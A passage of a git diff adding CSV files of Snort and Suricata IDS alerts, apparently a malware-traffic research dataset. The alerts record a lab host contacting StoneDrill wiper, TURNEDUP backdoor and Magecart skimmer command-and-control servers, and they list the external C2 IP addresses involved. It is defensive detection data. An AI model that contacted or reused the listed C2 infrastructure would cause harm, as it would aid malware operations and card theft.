Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50034 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:15:51.493","05/28-13:15:48.991354 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50026 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:15:50.496","05/28/2020-13:15:49.265686 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50026 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:15:48.491","05/28-13:15:46.426203 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50024 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 
13:15:47.494","05/28/2020-13:15:46.709652 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50024 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:15:45.491","05/28/2020-13:15:44.135823 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50023 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:15:45.489","05/28-13:15:43.838390 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50023 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:15:42.490","05/28/2020-13:15:41.547457 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50019 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:15:41.490","05/28/2020-13:15:38.748253 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50010 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:15:41.488","05/28-13:15:37.847438 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50010 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:15:41.488","05/28-13:15:41.057849 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50019 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:15:34.487","05/28/2020-13:15:32.516049 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware 
Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50002 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:15:34.485","05/28-13:15:32.225896 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50002 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:15:31.486","05/28/2020-13:15:29.953284 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49992 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:15:31.483","05/28-13:15:29.649923 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49992 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:15:28.482","05/28/2020-13:15:27.323007 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49986 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:15:28.481","05/28-13:15:26.987956 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49986 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:15:28.481","05/28/2020-13:15:24.665437 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49974 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:15:28.480","05/28-13:15:23.669672 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49974 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 
13:15:21.478","05/28-13:15:19.935319 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49973 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:15:21.478","05/28/2020-13:15:20.244212 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49973 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:15:18.477","05/28/2020-13:15:15.437188 [**] [1:2024732:5] ET MALWARE DNS Query For TURNEDUP.Backdoor CnC (googlmail) [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {UDP} 172.16.2.2:59771 -> 172.16.2.1:53","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:15:18.477","05/28/2020-13:15:16.780402 [**] [1:2825294:2] ETPRO MALWARE StoneDrill POST Login Request [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49971 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:15:18.477","05/28/2020-13:15:17.605349 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49972 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:15:18.477","05/28-13:15:15.437188 [**] [1:2024732:3] ET TROJAN DNS Query For TURNEDUP.Backdoor CnC (googlmail) [**] [Classification: A Network Trojan was detected] [Priority: 1] {UDP} 172.16.2.2:59771 -> 172.16.2.1:53","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:15:18.477","05/28-13:15:16.414374 [**] [1:2825294:1] ETPRO TROJAN StoneDrill POST Login Request [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49971 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:15:18.477","05/28-13:15:17.298368 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: 
A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49972 -> 58.158.177.102:80","/var/log/snort/alert.fast" diff --git a/data/MW_12_NIDS.csv b/data/MW_12_NIDS.csv new file mode 100644 index 0000000..6d20fbd --- /dev/null +++ b/data/MW_12_NIDS.csv 
@@ -0,0 +1,83 @@ +"@timestamp",message,"log.file.path" +"May 28, 2020 @ 13:41:17.834","05/28-13:41:12.093049 [**] [1:2023883:2] ET DNS Query to a *.top domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 172.16.2.2:61462 -> 172.16.2.1:53","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:41:15.585","05/28/2020-13:41:12.093049 [**] [1:2023883:3] ET DNS Query to a *.top domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 172.16.2.2:61462 -> 172.16.2.1:53","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:40:02.823","05/28-13:39:59.444612 [**] [1:2012810:9] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50206 -> 195.20.40.139:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:40:02.823","05/28-13:39:59.632140 [**] [1:2029204:2] ET TROJAN Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50208 -> 37.46.135.58:443","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:40:00.578","05/28/2020-13:39:59.745908 [**] [1:2029204:1] ET MALWARE Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50208 -> 37.46.135.58:443","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:39:59.578","05/28/2020-13:39:59.498117 [**] [1:2012810:11] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50206 -> 195.20.40.139:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:39:59.577","05/28/2020-13:39:58.657125 [**] [1:2012811:6] ET DNS Query to a .tk domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 172.16.2.2:58871 -> 172.16.2.1:53","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:39:59.577","05/28/2020-13:39:59.157502 [**] [1:2012811:6] ET DNS Query to a .tk domain - Likely Hostile [**] [Classification: 
Potentially Bad Traffic] [Priority: 2] {UDP} 172.16.2.2:58871 -> 172.16.2.1:53","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:39:47.821","05/28-13:39:38.994202 [**] [1:2029204:2] ET TROJAN Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50204 -> 37.46.135.58:443","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:39:47.821","05/28-13:39:39.127491 [**] [1:2029205:2] ET TROJAN Malicious SSL Cert (Magecart) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 37.46.135.58:443 -> 172.16.2.2:50204","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:39:44.575","05/28/2020-13:39:39.128788 [**] [1:2029204:1] ET MALWARE Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50204 -> 37.46.135.58:443","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:39:44.575","05/28/2020-13:39:39.265263 [**] [1:2029205:1] ET MALWARE Malicious SSL Cert (Magecart) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 37.46.135.58:443 -> 172.16.2.2:50204","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:38:32.770","05/28-13:38:25.683470 [**] [1:2029204:2] ET TROJAN Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50185 -> 37.46.135.58:443","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:38:32.770","05/28-13:38:25.682687 [**] [1:2012810:9] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50184 -> 195.20.40.139:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:38:29.552","05/28/2020-13:38:25.746734 [**] [1:2029204:1] ET MALWARE Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50185 -> 37.46.135.58:443","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:38:29.552","05/28/2020-13:38:25.819282 [**] 
[1:2012810:11] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50184 -> 195.20.40.139:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:38:22.549","05/28/2020-13:38:21.797884 [**] [1:2012810:11] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50169 -> 195.20.40.139:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:38:17.767","05/28-13:38:14.887610 [**] [1:2029204:2] ET TROJAN Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50177 -> 37.46.135.58:443","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:38:17.767","05/28-13:38:14.874111 [**] [1:2012810:9] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50169 -> 195.20.40.139:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:38:15.531","05/28/2020-13:38:14.976033 [**] [1:2029204:1] ET MALWARE Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50177 -> 37.46.135.58:443","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:38:14.766","05/28-13:38:13.964255 [**] [1:2012810:9] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50169 -> 195.20.40.139:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:38:14.766","05/28-13:38:14.125259 [**] [1:2029204:2] ET TROJAN Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50171 -> 37.46.135.58:443","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:38:14.530","05/28/2020-13:38:09.301440 [**] [1:2023883:3] ET DNS Query to a *.top domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 172.16.2.2:50267 -> 172.16.2.1:53","/var/log/suricata/fast.log" +"May 28, 2020 
@ 13:38:14.530","05/28/2020-13:38:10.951844 [**] [1:2029204:1] ET MALWARE Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50168 -> 37.46.135.58:443","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:38:14.530","05/28/2020-13:38:11.223587 [**] [1:2012810:11] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50165 -> 195.20.40.139:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:38:14.530","05/28/2020-13:38:14.118521 [**] [1:2012810:11] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50169 -> 195.20.40.139:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:38:14.530","05/28/2020-13:38:14.246371 [**] [1:2029204:1] ET MALWARE Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50171 -> 37.46.135.58:443","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:38:11.764","05/28-13:38:09.301440 [**] [1:2023883:2] ET DNS Query to a *.top domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 172.16.2.2:50267 -> 172.16.2.1:53","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:38:11.764","05/28-13:38:10.892521 [**] [1:2029204:2] ET TROJAN Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50168 -> 37.46.135.58:443","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:38:11.764","05/28-13:38:10.800791 [**] [1:2012810:9] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50165 -> 195.20.40.139:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:37:19.524","05/28/2020-13:37:10.343553 [**] [1:2023883:3] ET DNS Query to a *.top domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 172.16.2.2:57355 
-> 172.16.2.1:53","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:37:19.524","05/28/2020-13:37:15.473310 [**] [1:2029204:1] ET MALWARE Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50145 -> 37.46.135.58:443","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:37:19.524","05/28/2020-13:37:15.624963 [**] [1:2012810:11] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50144 -> 195.20.40.139:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:37:16.734","05/28-13:37:15.355320 [**] [1:2012810:9] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50144 -> 195.20.40.139:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:37:16.715","05/28-13:37:15.398868 [**] [1:2029204:2] ET TROJAN Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50145 -> 37.46.135.58:443","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:37:13.714","05/28-13:37:10.343553 [**] [1:2023883:2] ET DNS Query to a *.top domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 172.16.2.2:57355 -> 172.16.2.1:53","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:36:54.519","05/28/2020-13:36:45.918524 [**] [1:2029204:1] ET MALWARE Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50125 -> 37.46.135.58:443","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:36:54.519","05/28/2020-13:36:46.494212 [**] [1:2029204:1] ET MALWARE Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50126 -> 37.46.135.58:443","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:36:54.519","05/28/2020-13:36:46.755573 [**] [1:2029204:1] ET MALWARE Observed Magecart CnC Domain in TLS SNI [**] 
[Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50129 -> 37.46.135.58:443","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:36:48.711","05/28-13:36:45.816438 [**] [1:2029204:2] ET TROJAN Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50125 -> 37.46.135.58:443","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:36:48.711","05/28-13:36:46.408260 [**] [1:2029204:2] ET TROJAN Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50126 -> 37.46.135.58:443","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:36:48.711","05/28-13:36:46.659132 [**] [1:2029204:2] ET TROJAN Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50129 -> 37.46.135.58:443","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:36:19.507","05/28/2020-13:36:16.191893 [**] [1:2012810:11] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50105 -> 195.20.40.139:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:36:04.505","05/28/2020-13:36:01.784548 [**] [1:2029204:1] ET MALWARE Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50110 -> 37.46.135.58:443","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:36:03.705","05/28-13:35:55.787323 [**] [1:2029204:2] ET TROJAN Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50106 -> 37.46.135.58:443","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:36:03.705","05/28-13:35:55.774147 [**] [1:2012810:9] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50105 -> 195.20.40.139:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 
13:36:03.705","05/28-13:36:01.692375 [**] [1:2029204:2] ET TROJAN Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50110 -> 37.46.135.58:443","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:36:03.705","05/28-13:36:01.627700 [**] [1:2012810:9] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50105 -> 195.20.40.139:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:35:57.498","05/28/2020-13:35:55.835121 [**] [1:2012810:11] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50105 -> 195.20.40.139:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:35:57.498","05/28/2020-13:35:55.982731 [**] [1:2029204:1] ET MALWARE Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50106 -> 37.46.135.58:443","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:35:50.495","05/28/2020-13:35:42.129976 [**] [1:2023883:3] ET DNS Query to a *.top domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 172.16.2.2:55528 -> 172.16.2.1:53","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:35:50.495","05/28/2020-13:35:42.393843 [**] [1:2029204:1] ET MALWARE Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50085 -> 37.46.135.58:443","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:35:50.495","05/28/2020-13:35:42.477775 [**] [1:2012810:11] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50084 -> 195.20.40.139:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:35:50.495","05/28/2020-13:35:46.890339 [**] [1:2029204:1] ET MALWARE Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 
172.16.2.2:50094 -> 37.46.135.58:443","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:35:50.495","05/28/2020-13:35:47.141377 [**] [1:2012810:11] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50084 -> 195.20.40.139:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:35:50.495","05/28/2020-13:35:47.927837 [**] [1:2029204:1] ET MALWARE Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50096 -> 37.46.135.58:443","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:35:48.702","05/28-13:35:47.855194 [**] [1:2029204:2] ET TROJAN Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50096 -> 37.46.135.58:443","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:35:47.701","05/28-13:35:46.828658 [**] [1:2029204:2] ET TROJAN Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50094 -> 37.46.135.58:443","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:35:47.701","05/28-13:35:46.406582 [**] [1:2012810:9] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50084 -> 195.20.40.139:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:35:44.700","05/28-13:35:42.129976 [**] [1:2023883:2] ET DNS Query to a *.top domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 172.16.2.2:55528 -> 172.16.2.1:53","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:35:44.700","05/28-13:35:42.268678 [**] [1:2029204:2] ET TROJAN Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50085 -> 37.46.135.58:443","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:35:44.700","05/28-13:35:42.190530 [**] [1:2012810:9] ET POLICY HTTP Request to a *.tk domain [**] 
[Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50084 -> 195.20.40.139:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:35:25.491","05/28/2020-13:35:18.064953 [**] [1:2012810:11] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50056 -> 195.20.40.139:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:35:25.491","05/28/2020-13:35:18.332966 [**] [1:2029204:1] ET MALWARE Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50057 -> 37.46.135.58:443","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:35:19.696","05/28-13:35:17.954714 [**] [1:2012810:9] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50056 -> 195.20.40.139:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:35:19.696","05/28-13:35:18.228343 [**] [1:2029204:2] ET TROJAN Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50057 -> 37.46.135.58:443","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:34:17.689","05/28-13:34:13.729778 [**] [1:2023883:2] ET DNS Query to a *.top domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 172.16.2.2:60363 -> 172.16.2.1:53","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:34:17.689","05/28-13:34:13.890480 [**] [1:2029203:2] ET TROJAN Magecart CnC Domain Observed in DNS Query [**] [Classification: A Network Trojan was detected] [Priority: 1] {UDP} 172.16.2.2:59009 -> 172.16.2.1:53","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:34:17.689","05/28-13:34:14.010503 [**] [1:2012810:9] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50024 -> 195.20.40.139:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:34:17.689","05/28-13:34:14.845082 [**] [1:2029204:2] ET TROJAN 
Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50028 -> 37.46.135.58:443","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:34:17.689","05/28-13:34:14.845623 [**] [1:2029204:2] ET TROJAN Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50027 -> 37.46.135.58:443","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:34:17.689","05/28-13:34:14.916978 [**] [1:2029205:2] ET TROJAN Malicious SSL Cert (Magecart) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 37.46.135.58:443 -> 172.16.2.2:50027","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:34:17.689","05/28-13:34:14.918250 [**] [1:2029205:2] ET TROJAN Malicious SSL Cert (Magecart) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 37.46.135.58:443 -> 172.16.2.2:50028","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:34:15.481","05/28/2020-13:34:13.721410 [**] [1:2012811:6] ET DNS Query to a .tk domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 172.16.2.2:49940 -> 172.16.2.1:53","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:34:15.481","05/28/2020-13:34:13.729916 [**] [1:2023883:3] ET DNS Query to a *.top domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 172.16.2.2:54746 -> 172.16.2.1:53","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:34:15.481","05/28/2020-13:34:13.890480 [**] [1:2029203:1] ET MALWARE Magecart CnC Domain Observed in DNS Query [**] [Classification: A Network Trojan was detected] [Priority: 1] {UDP} 172.16.2.2:59009 -> 172.16.2.1:53","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:34:15.481","05/28/2020-13:34:13.890480 [**] [1:2014169:3] ET DNS Query for .su TLD (Soviet Union) Often Malware Related [**] [Classification: Potentially Bad 